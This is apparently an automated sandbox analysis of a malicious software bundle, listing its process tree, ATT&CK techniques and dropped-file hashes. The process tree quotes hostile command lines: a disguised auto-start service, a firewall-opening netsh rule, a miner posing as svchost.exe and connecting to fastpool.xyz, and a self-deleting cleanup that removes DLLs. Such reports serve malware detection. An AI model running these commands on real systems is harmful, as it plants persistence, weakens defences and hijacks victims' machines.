C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BCFE9BEC275901409AB41F7944EF276C C2⤵
- Loads dropped DLL
PID:6124 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F4E4EDBC0BCABDD4E7D073D8E98445D5 C2⤵
- Loads dropped DLL
PID:2404 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7F21C87E709EEAE59E4C72D5F1EB630B2⤵PID:5708
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7E8015A946B1B97E4246B1454BD0C664 C2⤵PID:7320
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵PID:7988
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵PID:6612
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:4328
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ff96c7adec0,0x7ff96c7aded0,0x7ff96c7adee05⤵PID:6184
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff654199e70,0x7ff654199e80,0x7ff654199e906⤵PID:6800
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=1864 /prefetch:85⤵PID:6172
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=1792 /prefetch:85⤵PID:7852
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:25⤵PID:7348
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2604 /prefetch:15⤵PID:6564
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2560 /prefetch:15⤵PID:6460
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3164 /prefetch:25⤵PID:6400
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=3196 /prefetch:85⤵PID:6200
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=3576 /prefetch:85⤵PID:6820
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=3480 /prefetch:85⤵PID:7432
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=1588 /prefetch:85⤵PID:5512
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=2128 /prefetch:85⤵PID:4680
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_89F7.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:8084
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5860
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7172
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8052
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7644
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:5832
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{218e3b72-66ac-3b41-87fc-f82ce7a50019}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7784
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"2⤵PID:3508
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:4616
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:3576
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:5240
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:7996
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\10DF.exeC:\Users\Admin\AppData\Local\Temp\10DF.exe1⤵PID:6548
-
C:\Users\Admin\AppData\Local\Temp\1209.exeC:\Users\Admin\AppData\Local\Temp\1209.exe1⤵PID:4652
-
C:\Users\Admin\AppData\Local\Temp\1391.exeC:\Users\Admin\AppData\Local\Temp\1391.exe1⤵PID:7848
-
C:\Users\Admin\AppData\Local\Temp\1632.exeC:\Users\Admin\AppData\Local\Temp\1632.exe1⤵PID:7360
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 1632.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1632.exe" & del C:\ProgramData\*.dll & exit2⤵PID:2040
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 1632.exe /f3⤵
- Kills process with taskkill
PID:4872 -
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:7152
-
C:\Users\Admin\AppData\Local\Temp\1C4D.exeC:\Users\Admin\AppData\Local\Temp\1C4D.exe1⤵PID:6760
-
C:\Users\Admin\AppData\Local\Temp\2007.exeC:\Users\Admin\AppData\Local\Temp\2007.exe1⤵PID:7844
-
C:\Users\Admin\AppData\Local\Temp\29DC.exeC:\Users\Admin\AppData\Local\Temp\29DC.exe1⤵PID:6332
-
C:\Users\Admin\AppData\Local\Temp\2EBF.exeC:\Users\Admin\AppData\Local\Temp\2EBF.exe1⤵PID:7104
-
C:\Users\Admin\AppData\Local\Temp\36FD.exeC:\Users\Admin\AppData\Local\Temp\36FD.exe1⤵PID:7900
-
C:\Windows\SysWOW64\cmd.execmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat2⤵PID:7400
-
C:\Users\Admin\AppData\Local\Temp\3D57.exeC:\Users\Admin\AppData\Local\Temp\3D57.exe1⤵PID:7896
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\agmavroz\2⤵PID:5188
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wfrxhcyo.exe" C:\Windows\SysWOW64\agmavroz\2⤵PID:5008
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create agmavroz binPath= "C:\Windows\SysWOW64\agmavroz\wfrxhcyo.exe /d\"C:\Users\Admin\AppData\Local\Temp\3D57.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:4972
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description agmavroz "wifi internet conection"2⤵PID:4496
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start agmavroz2⤵PID:5268
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:4196
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5084
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6160
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5140
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7380
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7916
-
C:\Windows\SysWOW64\agmavroz\wfrxhcyo.exeC:\Windows\SysWOW64\agmavroz\wfrxhcyo.exe /d"C:\Users\Admin\AppData\Local\Temp\3D57.exe"1⤵PID:5100
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:5356
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵PID:7808
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6004
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6976
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:856
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6260
-
C:\Users\Admin\AppData\Roaming\ajeivgsC:\Users\Admin\AppData\Roaming\ajeivgs1⤵PID:4816
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exeMD5
4abfaa5c65ef1bda178bb0ae3532454c
SHA121da67c8bf7c02917d6e41de07c2233c4a238035
SHA256a8de191a0b69f52442075daad2b131a75ec014b81779198e4d7c002d5ff5cb89
SHA512507539c7930d8fda8c6d33b942938094e4b460b91ccd371e46331bce7f49cce3d90f2bc2a608ec7bacabc127038f5f4a46f23411fe2f178a2cdb7ea0ab4f2561
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exeMD5
4abfaa5c65ef1bda178bb0ae3532454c
SHA121da67c8bf7c02917d6e41de07c2233c4a238035
SHA256a8de191a0b69f52442075daad2b131a75ec014b81779198e4d7c002d5ff5cb89
SHA512507539c7930d8fda8c6d33b942938094e4b460b91ccd371e46331bce7f49cce3d90f2bc2a608ec7bacabc127038f5f4a46f23411fe2f178a2cdb7ea0ab4f2561
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exeMD5
3f9d188595f40d91b8e7c4634f89c82a
SHA142a4c6ded84467f59e8a0e51f2b6295bb0171994
SHA2561e9fdba9e84dedcfdc3f69862350e56ffe8afbdcde704ad23959435b7fab79d3
SHA51241b37dc29a3e090dcd64093592137145db8a1ff60de0cd3fd6ba4949db32603aef082e9bfed0dda4bf18c4cfa57719a426f1e3dbd3cb7942b796e4c4ec0b7694
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exeMD5
3f9d188595f40d91b8e7c4634f89c82a
SHA142a4c6ded84467f59e8a0e51f2b6295bb0171994
SHA2561e9fdba9e84dedcfdc3f69862350e56ffe8afbdcde704ad23959435b7fab79d3
SHA51241b37dc29a3e090dcd64093592137145db8a1ff60de0cd3fd6ba4949db32603aef082e9bfed0dda4bf18c4cfa57719a426f1e3dbd3cb7942b796e4c4ec0b7694
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exeMD5
7deb5748d60dd5ee15d411d553dbaed4
SHA121f5d22e9dc3e090e87c3c825c3615d5d6932ac1
SHA256f0d7ffe237549994c5751933d545c8e7e5789259495e711be439f1c1411c5f08
SHA51273b38f63d8752b8b79a99f5548fdc0fb74605caaba551e624a29d5b246e64396c9ec1dd07ecf2da5abb2ebb8529998a2d6cdf1bacbbce51349652d856e81e981
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exeMD5
7deb5748d60dd5ee15d411d553dbaed4
SHA121f5d22e9dc3e090e87c3c825c3615d5d6932ac1
SHA256f0d7ffe237549994c5751933d545c8e7e5789259495e711be439f1c1411c5f08
SHA51273b38f63d8752b8b79a99f5548fdc0fb74605caaba551e624a29d5b246e64396c9ec1dd07ecf2da5abb2ebb8529998a2d6cdf1bacbbce51349652d856e81e981
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exeMD5
86f84b4e0896b69595c96c0b47730aba
SHA1701d48aac341abfff6a6f7e42d4a2625dfd5b2ed
SHA256f7364d427d78c94e17f33b7d34b63c553dcdd89dd568dae3f25812ea33ce7a30
SHA512ea70f8d8d4cdf4ff0a489de42f1f846a0e64865787b3b24f24988fecd93eaa045811675073bc9546df25fd5820f667cc7d0654e7071b97de48f9d730f35086fc
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exeMD5
86f84b4e0896b69595c96c0b47730aba
SHA1701d48aac341abfff6a6f7e42d4a2625dfd5b2ed
SHA256f7364d427d78c94e17f33b7d34b63c553dcdd89dd568dae3f25812ea33ce7a30
SHA512ea70f8d8d4cdf4ff0a489de42f1f846a0e64865787b3b24f24988fecd93eaa045811675073bc9546df25fd5820f667cc7d0654e7071b97de48f9d730f35086fc
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exeMD5
7d5fcdcba8c94cb9e69f3682fb79bfb6
SHA19dfb96ecc4aed70497592e14e3eb7d05b2f2ed29
SHA256e1f48f8a51b4d8f665f04f2201d67f1ebba80fffd765b00e832d3f683a5a30d7
SHA512b379282451e598d432bc3f73d586441660cacbc61dbc7bf5c3241e035d3c40305b42968035cbd55d82f87b30ecfe41cf302e79408a3a46c078ce7cec51e3fa50
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exeMD5
7d5fcdcba8c94cb9e69f3682fb79bfb6
SHA19dfb96ecc4aed70497592e14e3eb7d05b2f2ed29
SHA256e1f48f8a51b4d8f665f04f2201d67f1ebba80fffd765b00e832d3f683a5a30d7
SHA512b379282451e598d432bc3f73d586441660cacbc61dbc7bf5c3241e035d3c40305b42968035cbd55d82f87b30ecfe41cf302e79408a3a46c078ce7cec51e3fa50
-
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exeMD5
c07a49b77c116949efedc6f443957ae3
SHA1c67a3ac1dc5a45ac5ca84b035c785ffe0fc1c290
SHA256b22b057cc2020cfb5cf00f4d8e54a5d4f709babbdc2a03b9e21b38fee73c80be
SHA512d557c45621a9ab5be12034810fdaa39c24764e227b42c4d2e16fc9f05a7fd01b118a237c16777e6b3c4f1eddb268904bb4d3d09ea0a284729e2ae1a4ef13afd0
-
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exeMD5
c07a49b77c116949efedc6f443957ae3
SHA1c67a3ac1dc5a45ac5ca84b035c785ffe0fc1c290
SHA256b22b057cc2020cfb5cf00f4d8e54a5d4f709babbdc2a03b9e21b38fee73c80be
SHA512d557c45621a9ab5be12034810fdaa39c24764e227b42c4d2e16fc9f05a7fd01b118a237c16777e6b3c4f1eddb268904bb4d3d09ea0a284729e2ae1a4ef13afd0
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exeMD5
28b20d90d1efa7800697bc323b01a378
SHA18ed124ddc8a7861df1822196d0929908ee010528
SHA256cdc9a15859638b1abfa09483088b78bbf51ae92c6f9434a92f1ea7d93122de69
SHA512858c4e4596611b9ff04461adbd2c0bc01077829e246367d5c7185729c3aaf7bf185f6d69d05f52ca671320f2b6a72e70612422df7e0dffd4b3f096c96b96dec6
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exeMD5
28b20d90d1efa7800697bc323b01a378
SHA18ed124ddc8a7861df1822196d0929908ee010528
SHA256cdc9a15859638b1abfa09483088b78bbf51ae92c6f9434a92f1ea7d93122de69
SHA512858c4e4596611b9ff04461adbd2c0bc01077829e246367d5c7185729c3aaf7bf185f6d69d05f52ca671320f2b6a72e70612422df7e0dffd4b3f096c96b96dec6
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exeMD5
405f32d7d1c647b66c3f6b9a5355791a
SHA1e242181372ce53855995de4bacc9cbf340ec081f
SHA2563b4c4c4e34e28d067dce529db28cd17d85365bbf0934afead71aa034a115163a
SHA512ab61b02b542c3f209fb9172fbbb79747eb93b48d6a5b1871b7bdace0ad0fc0aa9550504698ed1457f9eb5436c19b0ffec1adda9fa94aebab7452316bb53f6e25
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exeMD5
405f32d7d1c647b66c3f6b9a5355791a
SHA1e242181372ce53855995de4bacc9cbf340ec081f
SHA2563b4c4c4e34e28d067dce529db28cd17d85365bbf0934afead71aa034a115163a
SHA512ab61b02b542c3f209fb9172fbbb79747eb93b48d6a5b1871b7bdace0ad0fc0aa9550504698ed1457f9eb5436c19b0ffec1adda9fa94aebab7452316bb53f6e25
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exeMD5
2317ac04c44eb878dabed59a2e1d31d5
SHA1533a25332ff5f12da218f8dad835289701e3349e
SHA256d6f91032cf32435dc6bd313cfe7f8c8889b21efae088cc2f86f44e4e17a56076
SHA512ff238556bdc8291f426f51735d974aeb2e9c284e7871628798d97b6eff078229909e16eb5232230eec21c5fca185de4e5847156840fc70fc6a3d2d3676c65bbf
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exeMD5
2317ac04c44eb878dabed59a2e1d31d5
SHA1533a25332ff5f12da218f8dad835289701e3349e
SHA256d6f91032cf32435dc6bd313cfe7f8c8889b21efae088cc2f86f44e4e17a56076
SHA512ff238556bdc8291f426f51735d974aeb2e9c284e7871628798d97b6eff078229909e16eb5232230eec21c5fca185de4e5847156840fc70fc6a3d2d3676c65bbf
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exeMD5
db697ca3d7452b522d8260c7ec2a2017
SHA1bcc4ba0fad283e127e3675ac48aa31ecc76a103f
SHA256e8c153bf71ba61edec1ff5025d79688b7ffbb963f21532ddbcc3c4a1cbc87a24
SHA51264c58ef74acf4953d44ea4dfde26a6ec89dfd4adbb930a9cdc2624534f349ee735b8ee14b2ad0e7ebc857a678102dadbfcb9d10940bc83239f0c2ef86f784cef
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exeMD5
db697ca3d7452b522d8260c7ec2a2017
SHA1bcc4ba0fad283e127e3675ac48aa31ecc76a103f
SHA256e8c153bf71ba61edec1ff5025d79688b7ffbb963f21532ddbcc3c4a1cbc87a24
SHA51264c58ef74acf4953d44ea4dfde26a6ec89dfd4adbb930a9cdc2624534f349ee735b8ee14b2ad0e7ebc857a678102dadbfcb9d10940bc83239f0c2ef86f784cef
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exeMD5
85ef2a29052e07e6624c274fe21a7854
SHA1ed206c8fcbf15ef2589bf24beb4774d35caea807
SHA256db7486e8c1dd51755a0706ac9bb389e0dac668d222c1ac443c6192e0cfe19b8e
SHA512939da4129696d2ab515042e6be9b457b85f7c2595e2247b5541133b80ad21b81b80734e5b9201ba1c83556c388ad32b59e08543e412c2476f91cd33eec1cec19
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exeMD5
85ef2a29052e07e6624c274fe21a7854
SHA1ed206c8fcbf15ef2589bf24beb4774d35caea807
SHA256db7486e8c1dd51755a0706ac9bb389e0dac668d222c1ac443c6192e0cfe19b8e
SHA512939da4129696d2ab515042e6be9b457b85f7c2595e2247b5541133b80ad21b81b80734e5b9201ba1c83556c388ad32b59e08543e412c2476f91cd33eec1cec19
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exeMD5
871dfa6b9a56ac4bf9feae18018b4e4f
SHA14c928426bb81ceec27d90a3970695416e34fcdb8
SHA2561e71a711db951d5c229e6e183315a3d6788be7386c28027b249fe979f02f9922
SHA512d887403d4b77efb3408d8f6662598a6b0e2ae8fc8719b822903ded845f66c57829a490ac8129165ca0d5786ba33c623e28d1fc297608f86a72851120a56522fa
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exeMD5
871dfa6b9a56ac4bf9feae18018b4e4f
SHA14c928426bb81ceec27d90a3970695416e34fcdb8
SHA2561e71a711db951d5c229e6e183315a3d6788be7386c28027b249fe979f02f9922
SHA512d887403d4b77efb3408d8f6662598a6b0e2ae8fc8719b822903ded845f66c57829a490ac8129165ca0d5786ba33c623e28d1fc297608f86a72851120a56522fa
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exeMD5
871dfa6b9a56ac4bf9feae18018b4e4f
SHA14c928426bb81ceec27d90a3970695416e34fcdb8
SHA2561e71a711db951d5c229e6e183315a3d6788be7386c28027b249fe979f02f9922
SHA512d887403d4b77efb3408d8f6662598a6b0e2ae8fc8719b822903ded845f66c57829a490ac8129165ca0d5786ba33c623e28d1fc297608f86a72851120a56522fa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157MD5
f7dcb24540769805e5bb30d193944dce
SHA1e26c583c562293356794937d9e2e6155d15449ee
SHA2566b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea
